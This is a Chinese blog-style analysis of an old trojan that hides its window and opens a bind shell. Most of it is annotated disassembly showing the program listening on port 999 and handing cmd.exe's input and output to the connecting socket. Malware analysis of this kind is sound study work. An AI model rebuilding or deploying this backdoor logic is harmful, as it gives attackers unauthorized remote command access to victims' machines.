minim木马分析

又是一个比较菜的木马分析，很久以前的木马，大家不要见笑。不积跬步无以至千里，我还是慢慢来呵呵。利用telent可以远程登录

基本信息

报告名称：mini木马分析

作者：

报告更新日期：

样本发现日期： .09.11

样本类型：

样本文件大小／被感染文件变化长度：

样本文件MD5 校验值：

样本文件SHA1 校验值：

壳信息：

可能受到威胁的系统：

相关漏洞：

已知检测名称：

简介

远程登录木马

网络症状

被监听的端口 999

详细分析／功能介绍

1.隐藏窗口

2.绑定999端口

3.监听等待客户端的连接请求

4.连接客户端

5.远程登录

预防及修复措施

设置防火墙，关注杀软提示

.text:00411410 wmain proc near ; CODE XREF: j_wmainj

.text:00411410

.text:00411410 var_504 = byte ptr -504h

.text:00411410 CommandLine = word ptr -440h

.text:00411410 StartupInfo = _STARTUPINFOW ptr -238h

.text:00411410 Dst = dword ptr -1ECh

.text:00411410 hObject = dword ptr -1E8h

.text:00411410 addrlen = dword ptr -1D4h

.text:00411410 name = sockaddr ptr -1C8h

.text:00411410 var_1B0 = dword ptr -1B0h

.text:00411410 s = dword ptr -1A4h

.text:00411410 WSAData = WSAData ptr -198h

.text:00411410 var_4 = dword ptr -4

.text:00411410

.text:00411410 push ebp

.text:00411411 mov ebp, esp

.text:00411413 sub esp, 504h

.text:00411419 push ebx

.text:0041141A push esi

.text:0041141B push edi

.text:0041141C lea edi, [ebp+var_504]

.text:00411422 mov ecx, 141h

.text:00411427 mov eax, 0CCCCCCCCh

.text:0041142C rep stosd

.text:0041142E mov eax, __security_cookie

.text:00411433 xor eax, ebp

.text:00411435 mov [ebp+var_4], eax

.text:00411438 mov esi, esp

隐藏窗口

.text:0041143A push 0 ; nCmdShow

.text:0041143C push 0 ; hWnd

.text:0041143E call ds:__imp__ShowWindow@8 ; ShowWindow(x,x)

初始化数据

.text:00411444 cmp esi, esp

.text:00411446 call j__RTC_CheckEsp； unicode校验函数

.text:0041144B push 10h ; Size

.text:0041144D push 0 ; Val

.text:0041144F lea eax, [ebp+Dst]

.text:00411455 push eax ; Dst

.text:00411456 call j__memset

.text:0041145B add esp, 0Ch

.text:0041145E push 44h ; Size

.text:00411460 push 0 ; Val

.text:00411462 lea eax, [ebp+StartupInfo]

.text:00411468 push eax ; Dst

.text:00411469 call j__memset

.text:0041146E add esp, 0Ch

.text:00411471 push 0FFh ; Size

.text:00411476 push 0 ; Val

.text:00411478 lea eax, [ebp+CommandLine]

.text:0041147E push eax ; Dst

.text:0041147F call j__memset

.text:00411484 add esp, 0Ch

.text:00411487 mov esi, esp

.text:00411489 push 1FEh ; nSize

.text:0041148E lea eax, [ebp+CommandLine]

.text:00411494 push eax ; lpBuffer

.text:00411495 push offset Name ;

COMSPEC 变量表示为: COMSPEC=C:\ 获取命令行路径

.text:0041149A call ds:__imp__GetEnvironmentVariableW@12 ; GetEnvironmentVariableW(x,x,x)

.text:004114A0 cmp esi, esp

.text:004114A2 call j__RTC_CheckEsp

.text:004114A7 mov esi, esp

.text:004114A9 lea eax, [ebp+WSAData]

套接字编程的初始化

.text:004114AF push eax ; lpWSAData

.text:004114B0 push 202h ; wVersionRequested

.text:004114B5 call ds:__imp__WSAStartup@8 ; WSAStartup(x,x)

.text:004114BB cmp esi, esp

.text:004114BD call j__RTC_CheckEsp

.text:004114C2 mov esi, esp

创建套接字

.text:004114C4 push 0 ; dwFlags

.text:004114C6 push 0 ; g

.text:004114C8 push 0 ; lpProtocolInfo

.text:004114CA push 6 ; protocol

.text:004114CC push 1 ; type

.text:004114CE push 2 ; af

.text:004114D0 call ds:__imp__WSASocketW@24 ; WSASocketW(x,x,x,x,x,x)

.text:004114D6 cmp esi, esp

.text:004114D8 call j__RTC_CheckEsp

.text:004114DD mov [ebp+s], eax

.text:004114E3 mov eax, 2

.text:004114E8 mov [ebp+name.sa_family], ax

.text:004114EF mov dword ptr [ebp+name.sa_data+2], 0

.text:004114F9 mov esi, esp

.text:004114FB push 999 ; hostshort

.text:00411500 call ds:__imp__htons@4 ; htons(x)

.text:00411506 cmp esi, esp

.text:00411508 call j__RTC_CheckEsp

.text:0041150D mov word ptr [ebp+name.sa_data], ax

.text:00411514 mov esi, esp

绑定端口999

.text:00411516 push 10h ; namelen

.text:00411518 lea eax, [ebp+name]

.text:0041151E push eax ; name

.text:0041151F mov ecx, [ebp+s]

.text:00411525 push ecx ; s

.text:00411526 call ds:__imp__bind@12 ;

.text:0041152C cmp esi, esp

.text:0041152E call j__RTC_CheckEsp

.text:00411533 mov esi, esp

监听

.text:00411535 push 1 ; backlog

.text:00411537 mov eax, [ebp+s]

.text:0041153D push eax ; s

.text:0041153E call ds:__imp__listen@8 ;

.text:00411544 cmp esi, esp

.text:00411546 call j__RTC_CheckEsp

.text:0041154B mov [ebp+addrlen], 10h

.text:00411555 mov esi, esp

连接远程服务器

.text:00411557 lea eax, [ebp+addrlen]

.text:0041155D push eax ; addrlen

.text:0041155E lea ecx, [ebp+name]

.text:00411564 push ecx ; addr

.text:00411565 mov edx, [ebp+s]

.text:0041156B push edx ; s

.text:0041156C call ds:__imp__accept@12 ;

.text:00411572 cmp esi, esp

.text:00411574 call j__RTC_CheckEsp

.text:00411579 mov [ebp+var_1B0], eax

.text:0041157F mov [ebp+StartupInfo.cb], 44h

.text:00411589 xor eax, eax

.text:0041158B mov [ebp+StartupInfo.wShowWindow], ax

.text:00411592 mov [ebp+StartupInfo.dwFlags], 101h

.text:0041159C mov eax, [ebp+var_1B0]

.text:004115A2 mov [ebp+StartupInfo.hStdError], eax ; 设置进程的输入输出缓冲区句柄为套接字

.text:004115A8 mov eax, [ebp+var_1B0]

.text:004115AE mov [ebp+StartupInfo.hStdInput], eax

.text:004115B4 mov eax, [ebp+var_1B0]

.text:004115BA mov [ebp+StartupInfo.hStdOutput], eax

.text:004115C0 mov esi, esp

.text:004115C2 lea eax, [ebp+Dst]

.text:004115C8 push eax ; lpProcessInformation

.text:004115C9 lea ecx, [ebp+StartupInfo]

创建进程 打开命令行 命令行的输入输出缓冲区为 已套接字

.text:004115CF push ecx ; lpStartupInfo

.text:004115D0 push 0 ; lpCurrentDirectory

.text:004115D2 push 0 ; lpEnvironment

.text:004115D4 push 0 ; dwCreationFlags

.text:004115D6 push 1 ; bInheritHandles

.text:004115D8 push 0 ; lpThreadAttributes

.text:004115DA push 0 ; lpProcessAttributes

.text:004115DC lea edx, [ebp+CommandLine]

.text:004115E2 push edx ; lpCommandLine

.text:004115E3 push 0 ; lpApplicationName

.text:004115E5 call ds:__imp__CreateProcessW@40 ; CreateProcessW(x,x,x,x,x,x,x,x,x,x)

.text:004115EB cmp esi, esp ;

.text:004115ED call j__RTC_CheckEsp

.text:004115F2 mov esi, esp

等待进程创建完毕

.text:004115F4 push 0FFFFFFFFh ; dwMilliseconds

.text:004115F6 mov eax, [ebp+Dst]

.text:004115FC push eax ; hHandle

.text:004115FD call ds:__imp__WaitForSingleObject@8 ; WaitForSingleObject(x,x)

.text:00411603 cmp esi, esp ;

.text:00411605 call j__RTC_CheckEsp

.text:0041160A mov esi, esp

.text:0041160C mov eax, [ebp+Dst]

.text:00411612 push eax ; hObject

.text:00411613 call ds:__imp__CloseHandle@4 ; CloseHandle(x)

.text:00411619 cmp esi, esp

.text:0041161B call j__RTC_CheckEsp

.text:00411620 mov esi, esp

.text:00411622 mov eax, [ebp+hObject]

.text:00411628 push eax ; hObject

.text:00411629 call ds:__imp__CloseHandle@4 ; CloseHandle(x)

.text:0041162F cmp esi, esp

.text:00411631 call j__RTC_CheckEsp

.text:00411636 mov esi, esp ; 关闭句柄

.text:00411638 mov eax, [ebp+s]

.text:0041163E push eax ; s

.text:0041163F call ds:__imp__closesocket@4 ; closesocket(x)

.text:00411645 cmp esi, esp

.text:00411647 call j__RTC_CheckEsp

.text:0041164C mov esi, esp

.text:0041164E mov eax, [ebp+var_1B0]

.text:00411654 push eax ; s

.text:00411655 call ds:__imp__closesocket@4 ; closesocket(x)

.text:0041165B cmp esi, esp

.text:0041165D call j__RTC_CheckEsp

.text:00411662 mov esi, esp

.text:00411664 call ds:__imp__WSACleanup@0 ; WSACleanup()

.text:0041166A cmp esi, esp

.text:0041166C call j__RTC_CheckEsp ; 关闭套接字，释放dll

.text:00411671 xor eax, eax

.text:00411673 push edx

.text:00411674 mov ecx, ebp

.text:00411676 push eax

.text:00411677 lea edx, dword_4116A4

.text:0041167D call j__RTC_CheckStackVars

.text:00411682 pop eax

.text:00411683 pop edx

.text:00411684 pop edi

.text:00411685 pop esi

.text:00411686 pop ebx

.text:00411687 mov ecx, [ebp+var_4]

.text:0041168A xor ecx, ebp

.text:0041168C call j___security_check_cookie

.text:00411691 add esp, 504h

.text:00411697 cmp ebp, esp

.text:00411699 call j__RTC_CheckEsp

.text:0041169E mov esp, ebp

.text:004116A0 pop ebp

.text:004116A1 retn

.text:004116A1 wmain endp

.text:004116A1